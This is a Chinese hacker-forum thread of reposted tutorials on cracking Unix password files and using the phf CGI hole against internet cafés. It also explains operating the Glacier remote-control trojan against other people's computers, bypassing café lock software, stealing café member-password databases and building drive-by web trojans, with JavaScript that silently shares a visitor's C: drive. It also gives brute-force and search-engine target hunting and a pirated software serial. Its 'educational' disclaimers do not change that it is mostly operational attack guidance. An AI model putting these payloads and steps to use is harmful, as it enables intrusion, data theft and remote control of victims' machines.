许多人从上一次介绍 Crack Jack 之�劬陀Ω靡丫�领教过它的功力了, 但是有几点需要说明的,
有些人使用 Jack 来帮你寻找 password, 我就当你已经抓到了没有 shadow 的 /etc/passwd,
但是为甚麽使用 Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为 Jack 还
是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字, 那当然连一个小小帐号
的密码你都别想猜到了. 数一下你所使用的字典档中有多少字 ??? 我用的字典档有十九万多个
字, 你的呢? 是不是小巫见大巫呀 ?? 那麽就赶快充实一下字典档再重新寻找吧 !!

许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由 passwd档转成字典档
的工具, 这是对一些喜欢使用 UserName 当作 Password 的人最好的方式, 但是也曾经好运的找到
别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的 ID 作为密码的 ??? 你可以很简单的使用
Qbasic 来�ぷ� "序数" 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到 1231 的密码
档出来:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
这支小程式将会写一个 "DATES" 的档案, �好婢褪悄阋�的字典, 当然啦, 这只是包含月跟日 !!
如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再 Run 一次试试看了, 不过这是一
个好的开始不是吗 ??

**如何保护自己的密码

谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解, 请遵守以下的原则: [1]不
用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大) [3]不用身份证字号
作为密码(LetMeIn! �河胁律矸葜ぷ趾诺墓δ芤�) [4]不用在字典中查得到的字作为密码.

那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是: 用一句有意
义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜
法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调 ?? 如果你的密码是 coolfire,
建议你最好能改成 CoolFire 或 coolfires (加�词� "s"), 这样被猜中的机率就小了很多. 如果
你是一个 Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@

**正式的话题

这次的话题当然还是 Crack, 相信许多人已经看过 CoolHC#1 了, 当然眼尖的人可能也已经 D/L
System Holes 试过了, 你有成功的例子吗 ?? 如果没有, 这份 CoolHC#2 可能就是你的强心针,
因为这次谈的正是 System Holes #1 成功的案例.

Step 1. 连线到 "蕃薯藤" 找 "网路咖啡" 找到好多家网路咖啡的 WWW 网址, 一一连上去试试看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行则会传回 /etc/passwd 资讯, 存档�垩杆� Logout, 使用 Crack Jack 解读!!

[[实例探讨]]

System Holes #1 中所介绍的 WWW 入侵法是这样子的: http://www.somewhere.com/cgi-bin/nph-test-cgi?* �墼� http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 连到 yournet.net
<[2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*>
[3] 接著如果出来一份像 Report 的画面的话, 接著输入 /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧 !!

这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能, 或是伺服器检索类型不同的机器则不
会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我, 你一定会找到一
家脱线的网路咖啡, ��没有像我们一样每天阅读 Mail List 的信, 对系统安全一点研究也没有的
人不在少数. http://hacker.welcome.com 就是这样的一个 Net Coffee Shop... 呵.... 快来试
试吧 !!

当 CoolFire 抓到 /etc/passwd ��, 立刻存档, 也马上断线, ��且拿出 UltraEdit 来瞧一下使用
者的资讯, 当然这个小 passwd 对 Crack Jack 来说, 实在是不够看, 没几分钟就在我的 486 机
器上显示出来几个以 UserName 作为 Password 的资讯 (归功於 PaSs2DiC 及 CrackJack 的功劳)
不过当我试著找寻 root 的密码时, 一想到我那将近 20 万字的字典档, 就想到可能花费的时间一
定相当的惊人, 於是就以 Jack 的 Option 设定只寻找 root 那一行, ... (过了良久)... 果不然
又是一个笨 root. 用了 "非常" 容易猜的密码... <--- This is JackAss... 呵!! Got It!

如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用 Crack Jack, 不然你也可
以将字典档切割成几个小档案, 然�墼俜直鹪诩府榛�器上跑, 我目前使用的配备是 486DX4-130
32MB RAM, 3.2GB HDD, 近 20 万字的字典档, 如果在分析较大的 passwd 档时我会将字典档切割
为四至五个小档 (看有多少�榛�器可跑), 然�墼诏幽┫掳嗲霸诠�司的几�榛�器上分别执行 Crack
Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一�榛�器, passwd 档又很大的话,
由於 Crack Jack 无法於 Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的
话, 亦可使用单机多工, 多开几个 DOS Box 来跑 Brute, 也许也是一个可行的办法!

**�塾�

有许多人在使用 Crack Jack 的时候有许多问题, 不过看了 CoolHC#1 应该都解决了吧 ?? 最近大
家问的比较多的是 UpYours 3.0, 虽然已经改进了 Install 的问题, 不过大家的问题还是都出在
Winsck.ocx 上面, 有人说装了 MSICP Beta 会好 ?? 但也有实例装了也还不能 Run 的, 在此建议
大家不要再玩 MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙, 已经证实有许多常用
的 MailBomb 没有办法 Fake IP 了 !! 所以... 如果 UpYours 3.0 装不起来的人就试试 KaBoom!
V3.0 吧 ! 虽然没有办法 Fake IP (选错 Mail Server 的话), 但是也是一个不错的 AnonyMailer
如果要发匿名信, 现在首页上有可以帮你发信的 Mailer, 会安全一点.

如果你仍旧对 UpYours 3.0 不死心, 就试试 ResSvr32.exe (Under Windows/system directory),
看看能不能将 WinSck.ocx 装上了... 记得先 UnReg 再 Reg...

在此建议大家可以多订阅一些 "系统安全" 讨论的 Mail List 或多参考一些已经被找出来的系统
漏洞, 因为有些人对这些方面��不是很重视, 所以这些资讯也就显得格外的重要了, 如果能够多
参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来, 放在手边
参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是 SendMail 的 Bug 实例, 在这中间
当然照往例会先出一份 System Holes #2 来作为资料. 如果有兴趣的人在 SH#2 出来的时候可以
先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......

------
上次讲的 Home Page 建置案还没搞完, 没有充实一下 Home Page 实在是对不起大家, 所以利用一点
时间写了 CoolHC#2, 可能报告又交不出来了 !! 老话, 如果你有兴趣写其它程式的中文说明, 请完
成�奂囊环莞�我, 我将它放在 Home Page 上面让其它人参考, 当然你也可以给我你的使用心得, 让
别人参考看看也行! 目前准备收集一系列的 System Hole List, 如果你在其它的站�橛锌吹降�, 请
把它先 Cut 下来, Mail 一份给我 !

------
再次重申, Crack 别人站�橹��鄄灰�破坏别人站�橹械淖柿�, 此篇文章仅作为教育目的, 不主张你随
便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上 (又... 如果第三次世界
大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持), 最严重的情况(如果你真的很讨厌该主
机的话)... 就将它 Shut Down.... 好了! 别太暴力了!

CoolFire 在 hotmail 的 ID 被别人抢先一步, 所以我的 ID 就变成 CoolFires 了 !! 真是 XO...


B5层 发表时间: 11/10 20:04

回复: mingming8 [mingming8]   论坛用户   登录
冰河2.2使用帮助

软件介绍

    冰河2.2是目前Internet网上最为流行的中文黑客木马程序,界面直观友好,即使是初学者也非常容易掌握。由于绝大多数黑客木马都是外国人编写的英文程序,没有一定的英语水平和电脑网络知识就不容易掌握使用,所以冰河 2.2就成了大多数网络黑客初学者入门的实验程序,这也是目前冰河木马在网上泛滥的主要原因。要保护自己,防止黑客入侵,就要了解黑客使用的手段。网络初学者最好从冰河2.2入手,逐步掌握黑客软件的使用和功能,以达到保护自己的目的。

软件下载

    首先从http://www.tty.com处下载软件。冰河2.2压缩包的文件名为Glacier22在本主页介绍的其他网站中也可以下载。目前冰河木马主要有2.0、2.1、和2.2三个版本,冰河2.2是最高版本,功能最强,速度最快。

软件组成

  冰河2.2解压缩后包括以下几个文件:
G_server.exe    被监控端后台监控程序,可任意改名伪装,运行一次后既自行安              装,并将原文件删除,而且被监控的计算机无明显运行标志。如果              有网友向你传递软件,你运行后无任何反映,且文件又突然不见,              那这个软件十有八九是黑客木马程序。
G_Client.exe  监控端主控程序,即本文主要介绍的程序,用于远程控制运行了                G_Server.exe程序的计算机。
Operate      服务器程序G_Server.exe配置文件。服务器程序G_Server.exe运                行前,可用主控程序G-Clienent.exe 对其进行设置,如设置访问                口令等等。
Readem        软件使用说明。

软件使用方法


                    一. 连接对方计算机
双击主控程序G_Client.exe,出现程序主界面如图:

   

      首先我们来看怎样连接上一台运行了冰河木马程序G_Server.exe的计算机,最好在网友之间进行实验,让他运行G_Server.exe并告诉你他的IP,(也可以用本软件中的搜索功能搜索网上运行了G_Server.exe的计算机,见后面的介绍)。
          打开"文件[F]"菜单,选"添加主机[A]",出现图(1)界面.在"显示名称"栏输入对方IP,比如输入"61.139.86.XXX",单击确定,就将对方计算机添加到"文件管理器"内,如图(2):


 
 

  用鼠标选中文件管理器内的"61.139.86.XXX",即开始登陆对方计算机,登陆的过程和结果可以从程序主界面最下端的状态栏内观察到.如果对方计算机运行的是冰河木马2.2版本,状态栏内一般会出现以下几种结果:
        1.主机"61.139.86.XXX"没有响应:对方计算机没有在Internet网上或IP地址不对;
        2.无法与主机"61.139.86.XXX"建立连接:有三种情况:
          a. 对方计算机内没有运行冰河木马G_Server.exe;
          b. 对方计算机内装有防火墙.很多防火墙都有防黑客的作用,即使你的计算机不幸中了木马,只要安装了防火墙,黑客也无法登陆你的计算机;
          c. 你自己的计算机内装有防火墙.要登陆对方计算机,最好去掉自己计算机中的防火墙.(如果你是在网吧内进行实验,连接失败时首先要考虑网吧的计算机是否装有防火墙).
        3.如果状态栏内依次出现"        ",那么恭喜你!你已经成功地登陆到对方计算机上了.你可以先从程序主界面中的"文件管理器"入手进行操作,然后逐步熟悉其它功能.冰河"文件管理器"的操作方法同Win9X中的"文件管理器"的操作方法一样,我想就不用我介绍了吧.

    到此为止,你已经初步掌握了冰河2.2的使用方法。冰河的功能很多,但它是中文界面,程序的使用符合中国人的习惯,只要你连接上对方的计算机,你就成功了一大半。只要肯花时间,各种功能的使用和操作是很容易上手的。以下几节主要对一些重要功能的使用方法作介绍,其他大多数功能自己去花时间熟悉吧。
特别提醒 1。当状态栏内出现  主机“61.139.86.XXX”没有响应 和 无法与主机“61.139.86.XXX”建立连接 时,应重复操作 选”我的电脑”--》选“61.139.86.XXX” 反复连接三到四次,在网络拥挤连接速度不好的情况下,一次连接成功的情况是较少的。
          2。连接到对方计算机后,在操作过程中随时都会出现  “主机没有响应”和“无法与主机建立连接”两种情况,同样应按上述方法重复三到四次连接,如还是连接不上,那多半是对方已经退出网络了。

              二。自动搜索网络上的计算机
    利用冰河2.2的自动搜索功能,黑客很容易将网络上中了冰河木马的计算机搜索出来,并将其IP地址自动加入到“文件管理器”中。所以,不要认为网海茫茫,别人就不会注意到你,如果你中了冰河木马,就等于随时都向别人敞开了方便之门。具体操作如下:
    打开“文件[F]”菜单,选“自动搜索[S]”出现图(3)界面。如我们要搜索XXX.139.86.1到XXX.139.86.255地址段的计算机,在“起始域”填入:XXX.139.86,“起始地址”填入:1,“终止地址”填入:255,单击“开始搜索”进行搜索。当搜索到运行有冰河木马的计算机时,“搜索结果”框内出现“OK XXX.138.86.75”(见图(4)),同时将其IP地址加入到“文件管理器”中。




 

 

 

 

 

 


    在对搜索到的计算机进行连接时,其连接结果有以下几种情况:
              1.口令有误,无法连接:这是对方木马在运行之前进行过木马配置并加了口令(配置方法见后面介绍)。如果不知道口令,就无法登陆对方计算机。如果知道口令,在主界面上的“访问口令”输入口令后单击“应用”,在进行连接。
              2.1.4版本,升节:冰河1.4是最早的一个版本,与2.0,2.1,2.2版本都不兼容,冰河2.2可将其升节到2.2版本(升级方法见后面介绍),只有升级成功后才能进行连接。
特别提醒冰河的自动搜索功能速度很慢,且一次只能搜索一个地址段最多255台计算机,黑客一般都是用端口扫描工具进行搜索的,如用网络刺客(本主页有介绍)进行搜索,一次能搜索上千台计算机,而且由于采用了多线程同时进行搜索,其速度比冰河要快得多。将用端口扫描工具搜索到的计算机的IP地址添加到到冰河的“文件管理器”中,就可以对其进行登陆连接了。

                      三.  文件的基本操作
  1.文件上传 即将自己计算机中的文件传送到对方计算机中去。在对方计算机中选择要放置文件的文件夹,单击鼠标右键打开一菜单,选“文件上传自.....Ctrl+U",然后在自己的计算机中选择要上传的文件,单击确定即可。想想看,要是自己的计算机中了冰河木马,在自己全然不知的情况下,别人往自己的计算机传送一些病毒或其他类型的木马进行实验,那后果......不用说了吧!!
  2.文件下载 即将对方计算机中的文件下载到自己的计算机中。在对方计算机中选择需要的文件,单击鼠标右键打开一菜单,选”文件下载至.....Ctrl+L“,然后在自己的计算机中选择好放置文件的文件夹,单击确定即可。未经别人同意下载他人的文件那叫偷窃!!
  3.远程打开文件 即在对方计算机中运行程序。选择对方计算机中要运行的程序文件,单击鼠标右键打开一 菜单,选”远程打开....Ctrl+S“即可。哈哈,这下对方计算机可乱套了,一会儿这个程序自动运行,一会儿那个程序自动运行,咦!!这究竟是怎么回事!!!
  4.本地打开文件 即在自己的计算机中运行对方计算机中的程序。选择对方计算机中的程序文件,单击鼠标右键打开菜单,选”本地打开.....Ctrl+E“即可。这个功能实际上就是将对方计算机中的文件下载到自己的计算机中打开,对对方没有任何影响。

  其他文件的操作如文件查找、复制、粘贴、删除等都很简单,这里就不一一赘述了。


    四.  对冰河木马进行配置 
  五.  升级1.4版本
  六.  命令控制台的操作


B6层 发表时间: 11/10 20:05

回复: mingming8 [mingming8]   论坛用户   登录
简单破坏美萍 
 
大家都知道只要开机出现桌面底色的时候,按下CTRL+ALT+DEL关闭smenu两次后就能关闭它了,可是美萍现在已经修正了这一个漏洞,无奈只能乖乖的交钱上机了,小弟今天就交大家一手吧。
首先下载一个“冰河”最新版本,因为网吧里大多都有防火墙,冰河的大多数版本成了防火墙通缉的对象,但是老板又不对防火墙升级,所以防火墙对最新版本的冰河就像瞎了眼睛一样。现在开始破美萍,首先双击一下服务端(G-Server),使自己用的这一台电脑中可爱的马马,接下来打开客户端(G-Client)看见左边有两个用户,单击“LocalHostt”,在下面会提示你连接成功,这时单击“命令控制台”后选“控制类命令”下的“进程管理”,点右面的“查看进程”,看到右面有“C:\SMENU\SMENU.EXE”吗?OK选定后点“终止进程”。现在最小化所有窗口,你看到了什么,注意不要让BOSS看见,否则……(不用我说了吧)。现在美萍破解成功。^_^
你不想每次都像这样破解一遍的话那就让我们来扩大一下战果吧,打开"c:\smenu",看到有一个“smenu.jst”文件了吗?把它K・O了(删了),然后双击“smenu.exe”,现在你的电脑又被美萍锁了(大家不要用石头扔我),单击开始中的“设定系统”,这时会要你输入密码,点确认后看到了你想看的东东了吧。^o^自己研究吧。什么,你用的那一台电脑C盘被隐藏了,你没看见那么高大的冰河木马在你的面前站着吗?单击“LocalHostt”前面的加号,现在可心看见C盘了吧。


B7层 发表时间: 11/10 20:06

回复: mingming8 [mingming8]   论坛用户   登录
取得会员密码 
 
 
任易打开一个文件夹,在地址栏的下拉菜单中点“桌面“―进入“网上邻居”--进“main”或

“server”(就是网吧的主机拉).进入后,看看主机开了哪些共享,如果有c盘共享,在c盘

里找“octcp”文件夹.再找“octolog.mdb”这个文件,如果没有c盘共享,在其它盘里看看有

没有例如“backup"或“备份”之类的文件夹,有的话试试看能不能找到octcp这类的东西有的

话还是找octolog.mdb这个文件。如果进主机的共享要密码,别怕下载一个工具

(http//go5.163.com/rxchacker/vredir.vxd),把它放到C:/windows/system里,在密码

框里随便输入一个字母,然后一直按“回车键”就可不用密码进入。


把octolog.mdb用office里access打开(如果本机没有access,可把这个文件作为“附件”

发到自己信箱,再到有access的机打开),打开后会向你要密码,别急通用密码"alpha'这

时会出现一个窗口,打开“userlist”

哈哈看见什么了……


B8层 发表时间: 11/10 20:09

回复: mingming8 [mingming8]   论坛用户   登录
突破网吧下载禁止 
 
突破禁止下载文件(对于没有netants,flashget等下载软件而用IE下载的情况)
1.打开Internet Explorer浏览器,点击菜单〈工具〉=>〈Internet选项〉=>〈安全〉=>〈默认级别〉
,即可。(高版本无效)
 

2.在需要下载的链接上单击鼠标右键,选择〈目标另存为〉保存即可。如果屏蔽了鼠标右键,可以这

样:左击目标然后按下shift+F9,哈哈,看到了吧
 

3.高版本把IE的<internet选项>中<安全>屏蔽了,方法一就不行了,不过可以通过修改注册表实现,在

注册表“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet

Settings\Zones\3”下,由1803控制,当1803值为0时“启用”下载,当1803值为3时“禁用”下载。
 

如果IE的工具选项里屏蔽了internet选项也可以在c:\windows\system\Inetcpl.cpp 文件名改为

Inetcpl.cpl 然后在里面修改就可以了


B9层 发表时间: 11/10 20:11

回复: mingming8 [mingming8]   论坛用户   登录
网页木马再利用 
 

大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。

1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:

网页加载中,请稍后....
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。

2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:

script language=javascript> document.write(""); function f(){ a1=document.

applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB900C04FD58A0B}");a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\

Flags",402,"REG_DWORD"); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\

Type",0,"REG_DWORD" ); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\

Path",

"C:\\"); } function init() { setTimeout("f()", 1000); } init();

当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,163申请一个域名的转换,如:http://123123.126.com连接目标地址里一定要填你现在的ip端口指向自己的8888端口吧,再修改一下上面共享c:的html代码,在最后加上一个5秒钟后自动跳转到http://123123.126.com的代码,我想做过主页的人都会的,这里不在唠叨了,这里的原理就是当对方打开了这个html的页面时,恶意的代码会让他的硬盘共享,5秒钟之后页面又自动跳转,而指向了你自己的计算机的8888端口,这时你的防火墙会记录下来自x.x.x.x的ip试图连接你的8888端口(在这之前要先稍微设置一下自己的防火墙)这个x.x.x.x的ip就是受害者的ip,剩下的事情就是共享连接了。 这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://jy86.126.com实际上就是一个转到http://go8.163.com/forevergujia/jy.htm的域名,当你完全打开了这个页面的时候,一个仅有5k多的一个小后门就打开了,你可以通telnet x.x.x.x 3385来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试。 这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦:) 好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处:)


B10层 发表时间: 11/10 20:12

回复: mingming8 [mingming8]   论坛用户   登录
几个很小但很有用的技巧   
 
【UltraEdit,Pass2Dic和流光200的组合妙用】
首先,我先介绍一下这几个软件,Ultraedit是一个十六进制编辑工具,功能强大;Pass2dic是Coolfire写的一个小工具,主要功能是把Unix系统中的密码文件(/etc/passwd)中的用户名分离出来;至于流光2000,恐怕就无人不知,无人不晓了,那是一个功能强大的黑客工具,主要用于探测和穷举密码。
下面,我就向大家介绍如何组合这几个工具来对系统进行密码攻击。首先,从网上下载一些免费邮件地址, 当然你也可以使用一些软件来获得电子邮件地址。接着,用Ultraedit打开包含电子邮件地址的文件,使用查找替换功能,查找@,替换为::@,记住,要全部替换,存盘退出。然后,运行Pass2dic, 输入修改过的包含电子邮件的文件,再输入你要保存用户名的文件,OK,这样你就获得了一些用户名,要记住, 这些用户名可要比使用某些软件生成的要好得多了!那么,现在就该运行功能强大的流光2000啦! 在SMTP主机输入你想攻击的主机IP地址,当然,该主机的25号端口得开放,否则当然没用处了。 后从列表(也就是我们取得的那个用户名文件了)添加用户,然后选择探测->验证主机用户,完成之后你就获得了有效的主机用户名了,接下来, 也就是最后一步, 你就可以用这些有效用户名, 再挂上一个强大的字典进行穷举攻击了,呵呵。。。先睡一觉吧!:)

【搜索引擎和漏洞库的组合使用】
这里,我们以http://www.google.com/和http://www.hack.co.za/为例。首先打开http://www.hack.co.za/网站进入CGI漏洞部分主页,以著名的phf漏洞为例,在http://www.google.com/的搜索栏输入关键字“/cgi-bin/phf”,按搜索按钮,呵呵。。。你看到什么?是不是很多网站啊?还楞着干什么?快动手啦!按照这个漏洞的Expolites, 你不仅可能拿到没有shadow过的passwd,还可能获得root权限呢!当然,如果你不走运的话,拿到了shadow过的passwd,那么只好穷举了。

【如何冲破鼠标右键的限制】
我们在网上冲浪的时候,经常会遇到这样的情况:当我们想单击右键打开一个新页面或者想调用网络蚂蚁下载软件的时候,跳出一个对话框提示请点击广告或者请把本站加入收藏夹。如果这样的情况遇到一次两次也就算了,但是如果经常遇到呢?所以我们要想办法冲破右键的限制,经过摸索,我找到了几个方法,你可以按我说的试一下。
第一种情况比较简单,方法一是先点右键,跳出对话框,提示请点击广告。这时按住右键,用左键点击确定按钮,放开左键,再放开右键,这时你是不是看到熟悉的右键弹出菜单了呢?还有一种方法,就是按住Shift键,然后单击右键,出现熟悉的右键弹出菜单。方法二比较通用,那就是查看源文件,通过源文件中的链接来实现和点击右键相同的功能。查看源文件的方法很多,一种是通过浏览器的查看->源文件来实现,还有一种就是先按一下Windows的快捷键, 然后在菜单中选择查看源文件即可。这个快捷键在右Ctrl的左边。
对于要求加入收藏夹的情况,一种方法是利用查看源文件的方法。另一种方法如下:在目标链接上点击鼠标右键,出现添加到收藏夹的窗口,这时不要松开右键,也不要移动鼠标;使用键盘的TAB键,移动焦点到取消按扭上, 按下空格键,窗口消失;松开右键,出现熟悉的菜单。

【安装D版Office 97后狂读光驱故障排除方法】
刚刚从D版盘安装后,无论重新启动系统还是关闭系统,都会读软驱,解决方法是删除启动里的关于Mircosoft Office的两个文件, 好象是Office启动和Office文件检索。

【WinZip7.0和WinZip8.0的通用注册办法】
用户名:任意中文名(如诸葛亮)
注册码:00990000

【安全网络程序的两点补充】
一是单独建立程序日志,二是定时备份重要数据,可以利用系统本身提供的定时功能,也可以通过在经常调用的页面嵌入定时备份程序。

【如何去掉OICQ列表中的某个号码】
主要是两个步骤,一是删掉选定号码的目录,二是用十六进制编辑器修改dat目录下的oicq2000.cfg文件,把第9个字节减1,然后删掉选定的号码。



B11层 发表时间: 11/10 20:12

回复: mingming8 [mingming8]   论坛用户   登录
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全
的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的
电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不
是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不
负责 !!

#1 甚么是 Hacking ?
就是入侵电脑! 有甚么好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件
等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最
好不要成为一个 "骇客", 我... 不是!

#2 为甚么要 Hack ?
我们只是为了要 解更多关於系统的技术, 入侵它, 解它是如何运作的, 试试
它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操
作 !! 为了安全性而作革命!

#3 Hack 守则
1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.
恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使
用!! 注意: 千万不要破坏别人的软体或资料 !!
2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後
将它改回原状.
3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.
4. 不要在 bbs 上谈论你 Hack 的任何事情.
5. 在 Post 文章的时候不要使用真名.
6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机.
8. 不在电话中谈论你 Hack 的任何事情.
9. 将你的笔记放在安全的地方.
10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞
的文件 (英文快点学好)!
11. 已侵入电脑中的帐号不得清除或修改.
12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须
维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!
13. 不将你已破解的帐号分享与你的朋友.

#4 破解之道
1. 进入主机中
2. 得到 /etc/passwd
3. 得到系统帐号
4. 得到最高权限

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)
或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能
同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进
行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚么??? 我不知
道, 你知道吗?!

底下的示范并不是像写出来的那么容易, 只不过是要让你 解如何进入, 当然其
中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了
面子.... 一定要删掉这些不堪入目的东西嘛...

示范进入主机的方法: (By CoolFire)

(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack
过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!
没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名
称, 请同学们要记得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)

ms.hinet.net telnet www.hackyou.hinet.net (Telnet 试试看....)
Trying 111.222.255.255...
Connected to cool.hackyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(没关系, 再来 !!)
cool login: hinet
Password:
Login incorrect

cool login:

(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)
telnet close
Connection closed.

(重来, 换个 Port 试试看 !!)

ms.hinet.net telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.


<_HTML>
<_HEAD>
<_TITLE>Error<_/TITLE>
<_/HEAD>
<_BODY>
<_H1>Error 400<_/H1>

Invalid request "" (unknown method)

<_P><_HR><_ADDRESS><_A _HREF="http://www.w3.org">CERN-HTTPD 3.0A<_/A><_/ADDRESS>
<_/BODY>
<_/HTML>
Connection closed by foreign host.

(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)
(换 FTP Port 试试)

ms.hinet.net ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
